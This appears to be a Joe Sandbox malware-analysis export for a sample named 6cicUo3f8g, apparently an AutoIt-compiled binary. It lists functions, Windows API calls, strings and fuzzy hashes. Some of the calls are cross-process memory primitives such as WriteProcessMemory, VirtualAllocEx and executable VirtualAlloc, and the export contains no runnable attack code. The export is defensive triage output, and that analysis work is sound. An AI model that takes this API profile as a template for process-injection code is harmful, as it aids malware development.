                                                                                                                • Opcode Fuzzy Hash: bb07427525012e0f0433da60b09c48d3ce5100550acb4c9f90dace6b6e45c2bb
                                                                                                                • Instruction Fuzzy Hash: AC51A071A00309DFDB24CFA9C881BAAB7F4FF44314F20466EE55ACB291E770AA54CB40
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00939296,?,?,00000034,00000800,?,00000034), ref: 009414E6
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0093983F
                                                                                                                  • Part of subcall function 00941487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009414B1
                                                                                                                  • Part of subcall function 009413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00941409
                                                                                                                  • Part of subcall function 009413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0093925A,00000034,?,?,00001004,00000000,00000000), ref: 00941419
                                                                                                                  • Part of subcall function 009413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0093925A,00000034,?,?,00001004,00000000,00000000), ref: 0094142F
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009398AC
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009398F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: d1bcdd53ce2c869c978f04da9cc020bf1c985fc07896b41e669bf826ba291277
                                                                                                                • Instruction ID: 23901670ff686b9122f40d43bc080dd15e68a9798120221265a0cc3efd1cc23f
                                                                                                                • Opcode Fuzzy Hash: d1bcdd53ce2c869c978f04da9cc020bf1c985fc07896b41e669bf826ba291277
                                                                                                                • Instruction Fuzzy Hash: 4E413B7690021CAFDB10EFA4CC81FDEBBB8EB49300F004199FA55B7191DA716E85CBA1
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0096F910,00000000,?,?,?,?), ref: 009679DF
                                                                                                                • GetWindowLongW.USER32 ref: 009679FC
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00967A0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: f82ef30e8b06e214939d27f5a793a6e5afb95007c80e6cf6e0fdba600da57f58
                                                                                                                • Instruction ID: fb3ae5223e64d99056ef35208a57a0d4bd3f8fb5ab185884f638c95ac2e3980d
                                                                                                                • Opcode Fuzzy Hash: f82ef30e8b06e214939d27f5a793a6e5afb95007c80e6cf6e0fdba600da57f58
                                                                                                                • Instruction Fuzzy Hash: C3319E31204606ABDB118FB8DC45BEAB7A9FF45328F244725F875E22E0D731ED519B50
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00967461
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00967475
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00967499
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 0635d594ce1347ff2c07d444a61592aa08ae6ab966d6dad2969e287eefb27f66
                                                                                                                • Instruction ID: 1a17c7b3061af426623fcb43f797b2d6337b09123298134b68e153c09085fac3
                                                                                                                • Opcode Fuzzy Hash: 0635d594ce1347ff2c07d444a61592aa08ae6ab966d6dad2969e287eefb27f66
                                                                                                                • Instruction Fuzzy Hash: 85219132614218BBDF118F94CC46FEA7B6AEF48728F110114FE156B1E0DAB5AC91DBA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00967C4A
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00967C58
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00967C5F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: d4062ccad2474525ad452d604fd9e217209cee484b8d66f2173e2a8c5d1564d7
                                                                                                                • Instruction ID: 8f83a967aea5e99d730e19406222c209720a1aff039482afc6d6fb810eb93ffa
                                                                                                                • Opcode Fuzzy Hash: d4062ccad2474525ad452d604fd9e217209cee484b8d66f2173e2a8c5d1564d7
                                                                                                                • Instruction Fuzzy Hash: 3B218EB1204208AFEB10DF68DCC1DA677ECEF5A358B150059FA119B3A1CB35EC519AA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00966D3B
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00966D4B
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00966D70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: fe45eb141261dd3760496323adfd0a3e46289732d0f3bd863ea9d1f0796aa9db
                                                                                                                • Instruction ID: 39c91ca7572d041c2099bca1b3467d8a169fa702160f4bd392e4a367bc8a5ff8
                                                                                                                • Opcode Fuzzy Hash: fe45eb141261dd3760496323adfd0a3e46289732d0f3bd863ea9d1f0796aa9db
                                                                                                                • Instruction Fuzzy Hash: B4219232614118BFDF118F58DC45FAB3BBEEF89754F018128FA459B1A0C6759C519BA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00967772
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00967787
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00967794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 269e9abc93e6ca7c700399fe5fbcfdda45e50ed0b77737cced1e0bf21ac03405
                                                                                                                • Instruction ID: 53212f5e65be101c3776d1bc51df6bf232a506eecc255ce6c65d7afa2c40e7a5
                                                                                                                • Opcode Fuzzy Hash: 269e9abc93e6ca7c700399fe5fbcfdda45e50ed0b77737cced1e0bf21ac03405
                                                                                                                • Instruction Fuzzy Hash: 3D113A72204208BFEF105FA5CC05FE7776CEF89B58F01011CF641A2090D272E811DB20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4BD0,?,008E4DEF,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4C11
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4C23
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 6a08b86e4f668f3f08c17d005e66d38904103d4f0399c36c8fa3212597b38560
                                                                                                                • Instruction ID: a6db747bb597c848cee17d6aa006b05060c3e1b8a38ce335c14c3a544229678e
                                                                                                                • Opcode Fuzzy Hash: 6a08b86e4f668f3f08c17d005e66d38904103d4f0399c36c8fa3212597b38560
                                                                                                                • Instruction Fuzzy Hash: 52D01230515B13CFD7209F75E918607B6D5FF0A395B129C3EE489D6150E6B0D480C751
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4B83,?), ref: 008E4C44
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4C56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 74543c2da1871a1fe555f91741dd89a095a61fd002b835e1443bbf6a2bb66dd8
                                                                                                                • Instruction ID: 7f9dd46dc4bdb7792a2e538bc3ac6e5de318f25d1f4d5bed6b09550341483a4f
                                                                                                                • Opcode Fuzzy Hash: 74543c2da1871a1fe555f91741dd89a095a61fd002b835e1443bbf6a2bb66dd8
                                                                                                                • Instruction Fuzzy Hash: D7D01730528713CFDB209F36E91861A76E4FF1A395B22983EE49AD6160E6B4D880CA50
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00961039), ref: 00960DF5
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00960E07
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: 6c4a0a4e250d1f18d0b2b1a803532c81a3a3aa6fa92a2e7668c8d3112f05f626
                                                                                                                • Instruction ID: f0906cdda6146f94d5a705054fb01d4b9f7ab9a7cd75a0177088ea86fe269a4b
                                                                                                                • Opcode Fuzzy Hash: 6c4a0a4e250d1f18d0b2b1a803532c81a3a3aa6fa92a2e7668c8d3112f05f626
                                                                                                                • Instruction Fuzzy Hash: 37D02E30424323CFEB218F78D84828372E8AF81382F02CC3EE882C2150E7F1D8A0CA00
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00958CF4,?,0096F910), ref: 009590EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00959100
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                • Opcode ID: 5bb3aa554a64c290ad905c2977b874ce69c9a2ef9595d2198a7817aba875a19a
                                                                                                                • Instruction ID: b3c5e16cc1cf4d9154e9138358b4af1c5c027e60af3cb219292d296825b2034d
                                                                                                                • Opcode Fuzzy Hash: 5bb3aa554a64c290ad905c2977b874ce69c9a2ef9595d2198a7817aba875a19a
                                                                                                                • Instruction Fuzzy Hash: E3D0123452C723CFDB20DF35E82850676D8AF06396B12883ED886D6550E7B0C480C790
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: 215f754ab8aa885d44a7859018c18b9b198651334db5a3b94f40dc2100e33298
                                                                                                                • Instruction ID: a2a58d13a15e850eb8054682e253c4c4b5b207736dddd0f69380c35de886c259
                                                                                                                • Opcode Fuzzy Hash: 215f754ab8aa885d44a7859018c18b9b198651334db5a3b94f40dc2100e33298
                                                                                                                • Instruction Fuzzy Hash: 11D01271818128EBCB109790A8998BD73BCB7A9301F100866F402D2044E2298765EA25
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4ad254dca96ea682ce81fcc829ca5cf49ee9011c148cc7a56a1af9ef13d9b6e
                                                                                                                • Instruction ID: b40f3acee6501fbd39880749cfdbe6e645e20419c932e732fb7d8371f77d5724
                                                                                                                • Opcode Fuzzy Hash: c4ad254dca96ea682ce81fcc829ca5cf49ee9011c148cc7a56a1af9ef13d9b6e
                                                                                                                • Instruction Fuzzy Hash: 0BC11CB5A0421AAFCB24CF94C884AAEFBB9FF48714F154598E815DB261D730ED41DF90
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0095E0BE
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0095E101
                                                                                                                  • Part of subcall function 0095D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095D7C5
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0095E301
                                                                                                                • _memmove.LIBCMT ref: 0095E314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3659485706-0
                                                                                                                • Opcode ID: aeac7ffb976a47c639aa1fb92f041277d09a341f2af9b3df801800adfd8ce45f
                                                                                                                • Instruction ID: 1fa9be72e66bba6fd1a4c6f4a95f190a633f2dccb7b7ec690bad6e2c6ff6a417
                                                                                                                • Opcode Fuzzy Hash: aeac7ffb976a47c639aa1fb92f041277d09a341f2af9b3df801800adfd8ce45f
                                                                                                                • Instruction Fuzzy Hash: B3C158716083519FC718DF29C480A6ABBE4FF89714F04896EF899DB351D731EA49CB82
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 009580C3
                                                                                                                • CoUninitialize.OLE32 ref: 009580CE
                                                                                                                  • Part of subcall function 0093D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093D5D4
                                                                                                                • VariantInit.OLEAUT32(?), ref: 009580D9
                                                                                                                • VariantClear.OLEAUT32(?), ref: 009583AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: 76a61185d35348a2b7c87daca2750abfe964c5f355ae368da02a6fc23b83741a
                                                                                                                • Instruction ID: 32c6106f0e65c36686db2e05a957789aefbd71748809d6b25157a3167a6c29e6
                                                                                                                • Opcode Fuzzy Hash: 76a61185d35348a2b7c87daca2750abfe964c5f355ae368da02a6fc23b83741a
                                                                                                                • Instruction Fuzzy Hash: 5BA16A752047519FCB00DF5AC481B2AB7E4FF8A354F044858F99AAB3A1CB74ED05CB42
                                                                                                                APIs
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00972C7C,?), ref: 009376EA
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00972C7C,?), ref: 00937702
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0096FB80,000000FF,?,00000000,00000800,00000000,?,00972C7C,?), ref: 00937727
                                                                                                                • _memcmp.LIBCMT ref: 00937748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 314563124-0
                                                                                                                • Opcode ID: 69349a8082dfa8bde481355a92a7058d95201ae27eb28516b73231c7d362e4e3
                                                                                                                • Instruction ID: 27e6d1ab5363044432bf1b0511b46018fa6257aff24593fa040c3f373a1d42ec
                                                                                                                • Opcode Fuzzy Hash: 69349a8082dfa8bde481355a92a7058d95201ae27eb28516b73231c7d362e4e3
                                                                                                                • Instruction Fuzzy Hash: 19810A71A00109AFCB14DFE4C994EEEB7B9FF89315F204558E506AB250DB71AE05CF61
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
